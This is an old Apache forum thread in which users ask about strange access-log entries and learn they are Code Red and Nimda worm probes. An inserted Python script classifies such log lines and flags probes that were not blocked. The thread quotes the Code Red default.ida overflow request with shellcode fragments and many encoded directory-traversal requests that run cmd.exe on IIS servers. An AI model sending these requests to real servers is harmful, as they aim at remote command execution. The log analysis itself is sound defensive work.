[ Apache ] Question about access.log


Marsh Posted on 16-05-2003 at 21:14:38

213.36.197.201 [27/Apr/2003:13:55:35 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 403 312


I have this in my "access" log, among all the local IPs (127.0.0.1).
It shows up 2 or 3 times with different IPs (but not local ones),
even though my server is private...

Hacking? Spying?


Marsh Posted on 16-05-2003 at 21:18:40

213.36.137.68 - - [16/May/2003:00:38:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 317
213.36.137.68 - - [16/May/2003:00:38:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 315
213.36.137.68 - - [16/May/2003:00:38:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:49 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:38:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 372
213.36.137.68 - - [16/May/2003:00:39:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:28 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.36.137.68 - - [16/May/2003:00:39:37 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:44 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:53 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:00 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:40:16 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339

 
That one, for sure, is a hack attempt :D

Marsh Posted on 16-05-2003 at 21:21:28

J-'-R wrote:


That one, for sure, is a hack attempt :D


 
No, those are infected IIS boxes trying to reproduce.
 
 
 


rincevent:/home/kadreg# grep cmd.exe /etc/apache/logs/default-access_log | wc -l
 121421
rincevent:/home/kadreg# grep default.ida /etc/apache/logs/default-access_log | wc -l
   2098
rincevent:/home/kadreg#
 


---------------
shatter people's dreams, something will always remain of it... -- let me troll on discu!

Marsh Posted on 16-05-2003 at 21:24:56

HotShot wrote:

Nope, it's simply yet another worm (Nimda, CodeRed etc.) that fires a request at lots of IPs, and it landed on yours by chance at some point...

You may also see GET cmd.exe etc. show up.

Anyway, it only attacks Microsoft-based servers, so no panic. Apart from filling your log with 404 errors, it won't do anything :p


ok, perfect, I worried over nothing... and you beat me to my next question :D
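The thread does this analysis by hand (kadreg's `grep | wc -l` counts, HotShot's Code Red / Nimda identification). The script below is an added example, not code from the thread: it parses Apache common-log lines, classifies the two worm signatures, decodes the double-percent and overlong-UTF-8 traversal variants into the path IIS would actually have seen, and reports per source IP, flagging the one check that matters on a non-IIS host: a probe that returned 200 instead of 403/404. The sample log is constructed for the example (four lines adapted from the thread plus two made-up lines, including one from 192.0.2.10 that is deliberately not blocked), and the `lenient_utf8` function is a simplified model of the permissive decoder on unpatched IIS, not a reimplementation of it.

```python
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample log (example data, not the thread's full log): four lines
# adapted from the thread plus a benign local hit and a made-up probe from
# 192.0.2.10 that the server answered with 200.
SAMPLE_LOG = """\
127.0.0.1 - - [16/May/2003:00:30:01 +0200] "GET /index.php HTTP/1.1" 200 1532
213.36.197.201 - - [27/Apr/2003:13:55:35 +0200] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 403 312
213.36.137.68 - - [16/May/2003:00:38:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 317
213.36.137.68 - - [16/May/2003:00:38:49 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:39:37 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
192.0.2.10 - - [16/May/2003:01:02:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4120
"""

# Apache common log format: ip ident user [ts] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)\s+(?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def lenient_utf8(raw: bytes) -> str:
    """Simplified model (assumption, not IIS code) of the permissive decoder
    behind the Nimda variants: a 0xC0..0xDF lead byte swallows the next byte as
    a continuation byte whatever its high bits, so %c0%af, %c0%2f -> '/' and
    %c1%1c, %c1%9c -> '\\'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonical_path(target: str) -> tuple[str, bool]:
    """Decode the request path the way the worm expects the target to decode
    it (two percent-decoding passes, then lenient UTF-8, backslash -> slash)
    and report whether the '..' segments climb above the web root."""
    path = target.split("?", 1)[0]
    raw = unquote_to_bytes(unquote_to_bytes(path))  # %255c -> %5c -> '\'
    decoded = lenient_utf8(raw).replace("\\", "/")
    depth, escaped, parts = 0, False, []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0
        else:
            depth += 1
        parts.append(seg)
    return "/" + "/".join(parts), escaped


def classify(target: str) -> str:
    """'codered' for the .ida overflow probe (%uXXXX-encoded payload),
    'nimda' for the cmd.exe/root.exe traversal family, else 'other'."""
    path, _ = canonical_path(target)
    query = target.split("?", 1)[1] if "?" in target else ""
    low = path.lower()
    if low == "/default.ida" and "%u" in query.lower():
        return "codered"
    if low.endswith(("/cmd.exe", "/root.exe")):
        return "nimda"
    return "other"


def summarize(log_text: str) -> dict:
    """Per-IP counts, plus any worm probe the server answered with 200."""
    report = defaultdict(
        lambda: {"codered": 0, "nimda": 0, "other": 0, "unblocked_probes": []}
    )
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        kind = classify(m["target"])
        entry = report[m["ip"]]
        entry[kind] += 1
        if kind != "other" and m["status"] == "200":
            entry["unblocked_probes"].append(m["target"])
    return dict(report)


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry)
```

Running it over a real `access_log` just means replacing `SAMPLE_LOG` with the file's contents; any non-empty `unblocked_probes` list on a host that is not IIS is the line worth reading twice, since a 403 or 404 is the expected answer and a 200 means something served that path.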

Marsh Posted on 16-05-2003 at 21:29:14

[Fri May 02 12:59:44 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/c
[Fri May 02 12:59:47 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/d
[Fri May 02 12:59:49 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/scripts
[Fri May 02 12:59:51 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_vti_bin
[Fri May 02 12:59:53 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_mem_bin
[Fri May 02 12:59:55 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/msadc

 
Is that manual hacking? Or worms?

Marsh Posted on 16-05-2003 at 22:29:51

:bounce:
